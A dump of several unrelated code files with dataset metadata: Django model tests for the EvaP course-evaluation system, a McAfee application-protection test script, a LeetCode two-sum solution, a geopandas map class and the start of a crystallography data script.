self.assertFalse(course.all_contributions_have_questionnaires)\n\n general_contribution = mommy.make(Contribution, course=course, contributor=None)\n course = Course.objects.get()\n self.assertFalse(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n questionnaire = mommy.make(Questionnaire)\n general_contribution.questionnaires.add(questionnaire)\n self.assertTrue(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n responsible_contribution.questionnaires.add(questionnaire)\n self.assertTrue(course.general_contribution_has_questionnaires)\n self.assertTrue(course.all_contributions_have_questionnaires)\n\n def test_deleting_last_modified_user_does_not_delete_course(self):\n user = mommy.make(UserProfile)\n course = mommy.make(Course, last_modified_user=user)\n user.delete()\n self.assertTrue(Course.objects.filter(pk=course.pk).exists())\n\n def test_responsible_contributors_ordering(self):\n course = mommy.make(Course)\n responsible1 = 
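The tests above stub properties such as Course.is_fully_reviewed by assigning to mock.__get__; unittest.mock's PropertyMock is the documented way to do the same thing. A self-contained illustration (the Course class here is a stand-in for the demo, not evap's model):

from unittest.mock import patch, PropertyMock

class Course:                      # stand-in class for illustration
    @property
    def is_fully_reviewed(self):
        return True

with patch.object(Course, "is_fully_reviewed",
                  new_callable=PropertyMock) as mock_prop:
    mock_prop.return_value = False
    assert Course().is_fully_reviewed is False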
mommy.make(UserProfile)\n responsible2 = mommy.make(UserProfile)\n contribution1 = mommy.make(Contribution, course=course, contributor=responsible1, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS, order=0)\n mommy.make(Contribution, course=course, contributor=responsible2, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS, order=1)\n\n self.assertEqual(list(course.responsible_contributors), [responsible1, responsible2])\n\n contribution1.order = 2\n contribution1.save()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(list(course.responsible_contributors), [responsible2, responsible1])\n\n def test_single_result_can_be_deleted_only_in_reviewed(self):\n responsible = mommy.make(UserProfile)\n course = mommy.make(Course, semester=mommy.make(Semester), is_single_result=True)\n contribution = mommy.make(Contribution,\n course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS,\n questionnaires=[Questionnaire.single_result_questionnaire()]\n )\n mommy.make(RatingAnswerCounter, answer=1, count=1, question=Questionnaire.single_result_questionnaire().questions.first(), contribution=contribution)\n course.single_result_created()\n course.publish()\n course.save()\n\n self.assertTrue(Course.objects.filter(pk=course.pk).exists())\n self.assertFalse(course.can_manager_delete)\n\n course.unpublish()\n self.assertTrue(course.can_manager_delete)\n\n RatingAnswerCounter.objects.filter(contribution__course=course).delete()\n course.delete()\n self.assertFalse(Course.objects.filter(pk=course.pk).exists())\n\n def test_single_result_can_be_published(self):\n \"\"\" Regression test for #1238 \"\"\"\n responsible = mommy.make(UserProfile)\n single_result = mommy.make(Course,\n semester=mommy.make(Semester), is_single_result=True, _participant_count=5, _voter_count=5\n )\n contribution = mommy.make(Contribution,\n course=single_result, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS,\n questionnaires=[Questionnaire.single_result_questionnaire()]\n )\n mommy.make(RatingAnswerCounter, answer=1, count=1, question=Questionnaire.single_result_questionnaire().questions.first(), contribution=contribution)\n\n single_result.single_result_created()\n single_result.publish() # used to crash\n\n def test_adding_second_voter_sets_can_publish_text_results_to_true(self):\n student1 = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, participants=[student1, student2], voters=[student1], state=\"in_evaluation\")\n course.save()\n top_general_questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n mommy.make(Question, questionnaire=top_general_questionnaire, type=Question.LIKERT)\n course.general_contribution.questionnaires.set([top_general_questionnaire])\n\n self.assertFalse(course.can_publish_text_results)\n\n let_user_vote_for_course(self.app, student2, course)\n course = Course.objects.get(pk=course.pk)\n\n self.assertTrue(course.can_publish_text_results)\n\n def test_textanswers_get_deleted_if_they_cannot_be_published(self):\n student = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student], voters=[student], can_publish_text_results=False)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n 
course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 0)\n\n def test_textanswers_do_not_get_deleted_if_they_can_be_published(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 1)\n\n def test_hidden_textanswers_get_deleted_on_publish(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"hidden\", state=TextAnswer.HIDDEN)\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"published\", state=TextAnswer.PUBLISHED)\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"private\", state=TextAnswer.PRIVATE)\n\n self.assertEqual(course.textanswer_set.count(), 3)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 2)\n self.assertFalse(TextAnswer.objects.filter(answer=\"hidden\").exists())\n\n def test_original_textanswers_get_deleted_on_publish(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"published answer\", original_answer=\"original answer\", state=TextAnswer.PUBLISHED)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n self.assertFalse(TextAnswer.objects.get().original_answer is None)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 1)\n self.assertTrue(TextAnswer.objects.get().original_answer is None)\n\n def test_publishing_and_unpublishing_effect_on_template_cache(self):\n student = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student], voters=[student], can_publish_text_results=True)\n\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n 
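Taken together, the four text-answer tests above pin down the publish-time policy. A hedged sketch of the logic they imply; only the model, manager, and field names come from the test code, the method body itself is an assumption about the implementation:

def cleanup_textanswers_on_publish(course):
    # No quorum to publish text results: drop everything.
    if not course.can_publish_text_results:
        course.textanswer_set.all().delete()
        return
    # Hidden answers are removed; published ones keep only the reviewed
    # text, so the original wording is wiped. Private answers survive.
    course.textanswer_set.filter(state=TextAnswer.HIDDEN).delete()
    course.textanswer_set.filter(state=TextAnswer.PUBLISHED).update(original_answer=None)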
self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n course.publish()\n\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n course.unpublish()\n\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n\nclass TestUserProfile(TestCase):\n\n def test_is_student(self):\n some_user = mommy.make(UserProfile)\n self.assertFalse(some_user.is_student)\n\n student = mommy.make(UserProfile, courses_participating_in=[mommy.make(Course)])\n self.assertTrue(student.is_student)\n\n contributor = mommy.make(UserProfile, contributions=[mommy.make(Contribution)])\n self.assertFalse(contributor.is_student)\n\n semester_contributed_to = mommy.make(Semester, created_at=date.today())\n semester_participated_in = mommy.make(Semester, created_at=date.today())\n course_contributed_to = mommy.make(Course, semester=semester_contributed_to)\n course_participated_in = mommy.make(Course, semester=semester_participated_in)\n contribution = mommy.make(Contribution, course=course_contributed_to)\n user = mommy.make(UserProfile, contributions=[contribution], courses_participating_in=[course_participated_in])\n\n self.assertTrue(user.is_student)\n\n semester_contributed_to.created_at = date.today() - timedelta(days=1)\n semester_contributed_to.save()\n\n self.assertTrue(user.is_student)\n\n semester_participated_in.created_at = date.today() - timedelta(days=2)\n semester_participated_in.save()\n\n self.assertFalse(user.is_student)\n\n def test_can_manager_delete(self):\n user = mommy.make(UserProfile)\n mommy.make(Course, participants=[user], state=\"new\")\n self.assertFalse(user.can_manager_delete)\n\n user2 = mommy.make(UserProfile)\n mommy.make(Course, participants=[user2], state=\"in_evaluation\")\n self.assertFalse(user2.can_manager_delete)\n\n contributor = mommy.make(UserProfile)\n mommy.make(Contribution, contributor=contributor)\n self.assertFalse(contributor.can_manager_delete)\n\n def test_inactive_users_hidden(self):\n active_user = mommy.make(UserProfile)\n mommy.make(UserProfile, is_active=False)\n\n self.assertEqual(list(UserProfile.objects.exclude_inactive_users().all()), [active_user])\n\n def test_inactive_users_shown(self):\n active_user = mommy.make(UserProfile)\n inactive_user = mommy.make(UserProfile, is_active=False)\n\n user_list = list(UserProfile.objects.all())\n self.assertIn(active_user, user_list)\n self.assertIn(inactive_user, user_list)\n\n\nclass ParticipationArchivingTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.semester = mommy.make(Semester)\n cls.course = 
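The cache assertions above revolve around get_course_result_template_fragment_cache_key. A hypothetical sketch of how such a key could be built on Django's stock helper; the fragment name "course_result" is invented for illustration and is not evap's actual one:

from django.core.cache.utils import make_template_fragment_key

def course_result_fragment_key(course_id, language, links_visible):
    # vary_on mirrors the three arguments the tests pass.
    return make_template_fragment_key(
        "course_result",                       # assumed fragment name
        [course_id, language, links_visible],
    )

key = course_result_fragment_key(42, "en", True)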
mommy.make(Course, state=\"published\", semester=cls.semester)\n cls.course.general_contribution.questionnaires.set([mommy.make(Questionnaire)])\n\n users = mommy.make(UserProfile, _quantity=3)\n cls.course.participants.set(users)\n cls.course.voters.set(users[:2])\n\n def refresh_course(self):\n \"\"\" refresh_from_db does not work with courses\"\"\"\n self.course = self.semester.courses.first()\n\n def setUp(self):\n self.semester.refresh_from_db()\n self.refresh_course()\n\n def test_counts_dont_change(self):\n \"\"\"\n Asserts that course.num_voters course.num_participants don't change after archiving.\n \"\"\"\n voter_count = self.course.num_voters\n participant_count = self.course.num_participants\n\n self.semester.archive_participations()\n self.refresh_course()\n\n self.assertEqual(voter_count, self.course.num_voters)\n self.assertEqual(participant_count, self.course.num_participants)\n\n def test_participants_do_not_loose_courses(self):\n \"\"\"\n Asserts that participants still participate in their courses after the participations get archived.\n \"\"\"\n some_participant = self.course.participants.first()\n\n self.semester.archive_participations()\n\n self.assertEqual(list(some_participant.courses_participating_in.all()), [self.course])\n\n def test_participations_are_archived(self):\n \"\"\"\n Tests whether participations_are_archived returns True on semesters and courses with archived participations.\n \"\"\"\n self.assertFalse(self.course.participations_are_archived)\n\n self.semester.archive_participations()\n self.refresh_course()\n\n self.assertTrue(self.course.participations_are_archived)\n\n def test_archiving_participations_does_not_change_results(self):\n distribution = calculate_average_distribution(self.course)\n\n self.semester.archive_participations()\n self.refresh_course()\n caches['results'].clear()\n\n new_distribution = calculate_average_distribution(self.course)\n self.assertEqual(new_distribution, distribution)\n\n def test_archiving_participations_twice_raises_exception(self):\n self.semester.archive_participations()\n with self.assertRaises(NotArchiveable):\n self.semester.archive_participations()\n with self.assertRaises(NotArchiveable):\n self.semester.courses.first()._archive_participations()\n\n def test_course_participations_are_not_archived_if_participant_count_is_set(self):\n course = mommy.make(Course, state=\"published\", _participant_count=1, _voter_count=1)\n self.assertFalse(course.participations_are_archived)\n self.assertTrue(course.participations_can_be_archived)\n\n def test_archiving_participations_doesnt_change_single_results_participant_count(self):\n responsible = mommy.make(UserProfile)\n course = mommy.make(Course,\n state=\"published\", is_single_result=True, _participant_count=5, _voter_count=5\n )\n contribution = mommy.make(Contribution, course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n contribution.questionnaires.add(Questionnaire.single_result_questionnaire())\n\n course.semester.archive_participations()\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course._participant_count, 5)\n self.assertEqual(course._voter_count, 5)\n\n\nclass TestLoginUrlEmail(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.other_user = mommy.make(UserProfile, email=\"other@extern.com\")\n cls.user = mommy.make(UserProfile, email=\"extern@extern.com\")\n cls.user.ensure_valid_login_key()\n\n cls.course = mommy.make(Course)\n 
mommy.make(Contribution, course=cls.course, contributor=cls.user, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n\n cls.template = mommy.make(EmailTemplate, body=\"{{ login_url }}\")\n\n EmailTemplate.objects.filter(name=\"Login Key Created\").update(body=\"{{ user.login_url }}\")\n\n @override_settings(PAGE_URL=\"https://example.com\")\n def test_no_login_url_when_delegates_in_cc(self):\n self.user.delegates.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], EmailTemplate.CONTRIBUTORS, use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(mail.outbox[0].body, \"\") # message does not contain the login url\n self.assertEqual(mail.outbox[1].body, self.user.login_url) # separate email with login url was sent\n self.assertEqual(len(mail.outbox[1].cc), 0)\n self.assertEqual(mail.outbox[1].to, [self.user.email])\n\n def test_no_login_url_when_cc_users_in_cc(self):\n self.user.cc_users.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(mail.outbox[0].body, \"\") # message does not contain the login url\n self.assertEqual(mail.outbox[1].body, self.user.login_url) # separate email with login url was sent\n self.assertEqual(len(mail.outbox[1].cc), 0)\n self.assertEqual(mail.outbox[1].to, [self.user.email])\n\n def test_login_url_when_nobody_in_cc(self):\n # message is not sent to others in cc\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].body, self.user.login_url) # message does contain the login url\n\n def test_login_url_when_use_cc_is_false(self):\n # message is not sent to others in cc\n self.user.delegates.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=False, request=None)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].body, self.user.login_url) # message does contain the login url\n\n\nclass TestEmailTemplate(TestCase):\n def test_missing_email_address(self):\n \"\"\"\n Tests that __send_to_user behaves when the user has no email address.\n Regression test to https://github.com/fsr-itse/EvaP/issues/825\n \"\"\"\n user = mommy.make(UserProfile, email=None)\n template = EmailTemplate.objects.get(name=EmailTemplate.STUDENT_REMINDER)\n EmailTemplate.send_to_user(user, template, {}, {}, False, None)\n\n\nclass TestEmailRecipientList(TestCase):\n def test_recipient_list(self):\n course = mommy.make(Course)\n responsible = mommy.make(UserProfile)\n editor = mommy.make(UserProfile)\n contributor = mommy.make(UserProfile)\n mommy.make(Contribution, course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n mommy.make(Contribution, course=course, contributor=editor, can_edit=True)\n mommy.make(Contribution, course=course, contributor=contributor)\n\n participant1 = mommy.make(UserProfile, courses_participating_in=[course])\n participant2 = mommy.make(UserProfile, courses_participating_in=[course])\n course.voters.set([participant1])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [])\n\n recipient_list = 
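All of these assertions lean on Django's test email backend, which collects outgoing messages in mail.outbox instead of sending them. A minimal standalone demonstration of that mechanism:

from django.core import mail
from django.test import TestCase

class OutboxDemo(TestCase):
    def test_outbox_collects_messages(self):
        # The locmem test backend appends every sent message to mail.outbox.
        mail.send_mail("subject", "body",
                       "from@example.com", ["to@example.com"])
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual(mail.outbox[0].to, ["to@example.com"])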
EmailTemplate.recipient_list_for_course(course, [EmailTemplate.RESPONSIBLE], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.EDITORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible, editor])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible, editor, contributor])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.ALL_PARTICIPANTS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [participant1, participant2])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.DUE_PARTICIPANTS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [participant2])\n\n def test_recipient_list_filtering(self):\n course = mommy.make(Course)\n\n contributor1 = mommy.make(UserProfile)\n contributor2 = mommy.make(UserProfile, delegates=[contributor1])\n\n mommy.make(Contribution, course=course, contributor=contributor1)\n mommy.make(Contribution, course=course, contributor=contributor2)\n\n # no-one should get filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [contributor1, contributor2])\n\n # contributor1 is in cc of contributor2 and gets filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=True)\n self.assertCountEqual(recipient_list, [contributor2])\n\n contributor3 = mommy.make(UserProfile, delegates=[contributor2])\n mommy.make(Contribution, course=course, contributor=contributor3)\n\n # again, no-one should get filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [contributor1, contributor2, contributor3])\n\n # contributor1 is in cc of contributor2 and gets filtered.\n # contributor2 is in cc of contributor3 but is not filtered since contributor1 wouldn't get an email at all then.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=True)\n self.assertCountEqual(recipient_list, [contributor2, contributor3])\n","sub_path":"evap/evaluation/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":29103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128228734","text":"#!/usr/bin/python\n# Copyright (C) 2010 McAfee, Inc. 
All rights reserved.\n# TestcaseID: 17435\n# TestcaseDescription: Application behaviour when hard link is created and app is added to AppPro rule \n\nimport sys\nimport logging\nimport subprocess\nimport os\n\n# Import CommonTest module into current namespace\ncommon_path=os.path.dirname(os.path.abspath(sys.argv[0])) + \"/../\"\nsys.path.append(common_path + \"/Common\")\n\n\nimport commonFns\nimport CommonAppProFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : 17435\")\n logging.info(\"Description : Application behaviour when hard link is created and app is added to AppPro rule\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n _retval = BaseTest.init(self)\n if _retval != 0:\n return 1\n # Install the test tool\n logging.debug(\"Installing appProtTestTool\")\n if CommonAppProFns.installAppProtTestTool() != True :\n logging.error(\"Failed to install appProtTestTool\")\n return 1\n CommonAppProFns.resetAppProtToDefaults()\n self._rule = dict()\n self._binaryPath = os.path.dirname(os.path.abspath(sys.argv[0])) + \"/data/SampleApplications/UDPClient\" \n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n # Set exclusion for aptt\n if CommonAppProFns.setAppProExclusions( [ os.path.dirname(os.path.abspath(sys.argv[0])) + \"/data/aptt\" ]) != True:\n logging.error(\"Unable to add aptt exclusion\")\n return 1\n logging.debug(\"Added exclusion for aptt\")\n \n # Set unknown app action to block\n if CommonAppProFns.setUnknownAppAction(2) != True:\n logging.error(\"Unable to set unknown apps to block. Can't proceed\")\n return 1\n logging.debug(\"set unknown app action to deny\")\n \n # Lets Add a rule for UDPClient binary\n self._rule[\"AppPath\"]= self._binaryPath\n self._rule[\"ExecAllowed\"]=\"1\"\n self._rule[\"Enabled\"]=\"1\"\n self._rule[\"NwAction\"]=\"1\"\n _retval= CommonAppProFns.addAppProtRule(self._rule)\n if _retval != CommonAppProFns.SUCCESS:\n logging.error(\"Addition of rule failed with code \" + str(_retval))\n return 1\n\n logging.debug(\"Added rule for UDPClient\")\n # Lets create a hardlink for UDPClient\n retval = subprocess.call( [ \"ln\",\n \"-f\",\n self._binaryPath,\n self._binaryPath+\"_hl\" ] )\n if retval != 0:\n logging.error(\"Hardlink creation failed\")\n return 1\n \n retval = subprocess.call( [ self._binaryPath+\"_hl\",\n \"172.16.193.1\",\n \"500\",\n \"Message\" ])\n if retval != 0:\n logging.error(\"Launching of UDPClient failed\")\n return 1\n\n return 0\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n CommonAppProFns.resetAppProtToDefaults()\n # delete the hardlink\n try:\n os.remove(self._binaryPath+\"_hl\")\n except:\n pass\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... 
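The execute step above shells out to `ln -f` to build the hard link. The standard library can do the same thing directly; a small sketch with throwaway paths (the path below is illustrative only, not the test binary):

import os

src = "/tmp/UDPClient_demo"      # illustrative path for the demo
dst = src + "_hl"

open(src, "a").close()           # make sure the source exists
if os.path.exists(dst):
    os.remove(dst)               # emulate ln's -f (force) behaviour
os.link(src, dst)                # hard link: same inode, second name
assert os.path.samefile(src, dst)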
\n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal += testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/TestAutomation/Testcases/FVT/AppProtection/Appprot_Adhoc_12.py","file_name":"Appprot_Adhoc_12.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171929203","text":"# p001 Two Sum\n# Easy\n\n# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# \"\"\"\n# type nums: List[int]\n# type target: int\n# rtype: List[int]\n# \"\"\"\n \nclass Solution(object):\n def twoSum(self, nums, target): # brutal force, slowest\n for i in nums:\n index_i = nums.index(i)\n for j in nums[index_i+1:]:\n if i + j == target:\n if i != j:\n return [index_i, nums.index(j)]\n else:\n return [index_i, nums.index(i, index_i+1)]\n \n def twoSum2(self, nums, target): # brutal force, check half first\n half = target / 2\n if nums.count(half) == 2:\n indexHalf =nums.index(half)\n return [indexHalf, nums.index(half, indexHalf+1)]\n for i in nums:\n if i != half:\n if target - i in nums:\n return [nums.index(i), nums.index(target - i)]\n\nif __name__ == '__main__':\n assert Solution().twoSum2([11, 2, 7, 15], 9) == [1,2], 'regular'\n assert Solution().twoSum2([11, 7, 2, 15], 9) == [1,2], 'regular revert'\n assert Solution().twoSum2([3, 3], 6) == [0,1], 'two identical'\n assert Solution().twoSum2([-1, -2, -3, -4, -5], -8) == [2, 4], 'negative int'\n assert Solution().twoSum2([3, 2, 4], 6) == [1, 2], 'struggle with 1/2 target'\n print('test done, all passed')\n","sub_path":"LeetCode/p001_two_sum.py","file_name":"p001_two_sum.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450059800","text":"from Maps.MapFunctions import *\nfrom Maps.baseMap import BaseMap\n\n\nclass LocalMap(BaseMap):\n '''Figure for the map of Asten'''\n\n def getData(self, checkList: list) -> list:\n '''\n :param region: The 'Region' geopandas dataframe\n :param pumps: The 'Pump' geopandas dataframe\n :return: List of shapes to be visualized on a map.\n '''\n # Find the data of the region\n plot_data = []\n region_to_visualize=None\n for index, row in self.geoDict['Region'].iterrows():\n if self.name in row['GAGNAAM']:\n region_to_visualize = row\n\n # Get the outline cords and create an (filled) outline of the region\n if region_to_visualize.geometry.type == 'MultiPolygon':\n x = [transformCoords(poly).exterior.xy[0] for poly in region_to_visualize['geometry']]\n y = [transformCoords(poly).exterior.xy[1] for poly in region_to_visualize['geometry']]\n for i in range(len(x)):\n plot_data.append(createRegionShape(x[i], y[i], region_to_visualize))\n else:\n x, y = transformCoords(region_to_visualize.geometry).exterior.xy\n plot_data.append(createRegionShape(x, y, region_to_visualize))\n\n if 'treat' in checkList:\n # Add a marker for the treatment plant of the region if the user choose to plot treatment plants\n treatment_plant= None\n for index, row in self.geoDict['WWTP'].iterrows():\n 
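Both solutions above are quadratic, and twoSum2 needs a special case for target / 2. A single-pass dict keeps indices as it scans, which is O(n) and handles duplicates naturally:

def two_sum(nums, target):
    seen = {}                          # value -> index of first occurrence
    for i, n in enumerate(nums):
        complement = target - n
        if complement in seen:
            return [seen[complement], i]
        seen[n] = i
    return None

assert two_sum([11, 2, 7, 15], 9) == [1, 2]
assert two_sum([3, 3], 6) == [0, 1]    # duplicates need no special case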
if self.name in row['ZRWNAAM']:\n treatment_plant = row\n plot_data.append(createTreatmentMarker(treatment_plant))\n\n if 'pump' in checkList:\n # Look and map all known pumps if the user chose to plot treatment plants\n for index, row in self.geoDict['Pump'].iterrows():\n # If a pump has no location, skip it\n if row['geometry'] is None:\n continue\n # Create a pump marker for every pump that's in the region area\n if row['geometry'].within(region_to_visualize['geometry']):\n plot_data.append(createMarker(row))\n\n if 'sub' in checkList:\n # Look and map all the subregions is the user chose\n for index, row in self.geoDict['Subregion'].iterrows():\n # If a subregion has no geometry, skip it\n if row['geometry'] is None:\n continue\n # Create a subregion shape for every pump that's in the region area\n if row['geometry'].within(region_to_visualize['geometry']):\n if row.geometry.type == 'MultiPolygon':\n x = [transformCoords(poly).exterior.xy[0] for poly in row['geometry']]\n y = [transformCoords(poly).exterior.xy[1] for poly in row['geometry']]\n for i in range(len(x)):\n plot_data.append(createRegionShape(x[i], y[i], row))\n else:\n x, y = transformCoords(row.geometry).exterior.xy\n plot_data.append(createRegionShape(x, y, row, True))\n return plot_data","sub_path":"Maps/LocalMap.py","file_name":"LocalMap.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"333521770","text":"# free to use or modify\n# Authors: \n# Qun Liu: qun.liu@gmail.com\n# Lina Takamaru: llt45@cornell.edu\n# References: J. Appl. Cryst. (2020). 53 https://doi.org/10.1107/S160057671901673X\nimport math, re, os, sys, glob, pprint, argparse\n\n## write for_sorting.tmp2 and data_with_frame_selected.txt files \ndef createFs(dir_output, dataprefix='Puck', cc_cutoff=0.4):\n\tos.chdir(dir_output)\n\t#print \"cctes\", os.getcwd()\n\tcheck = [dir_output+\"/for_sorting.tmp2\", dir_output+\"/data_with_frame_selected.txt\"]\n\tfor files in check:\n\t\tif os.path.exists(files):\n\t\t\tos.remove(files)\n\n\t#pFiles is a list of folders beginning with Puck\n\t#pFiles = glob.glob('../Puck*')\n#\tpFiles=[]\n#\tlist_file = dataprefix.split(' ')\n#\tprint(\"list_file\", list_file)\n#\tfor list_file in list(dataprefix):\n#\t\tpFiles.append(glob.glob(list_file+\"*\"))\n\tpFiles = glob.glob(dataprefix+\"*\")\n\t#print(\"directories\", pFiles)\n\twedges = []\n\tmaxFiles = []\n\toutput = 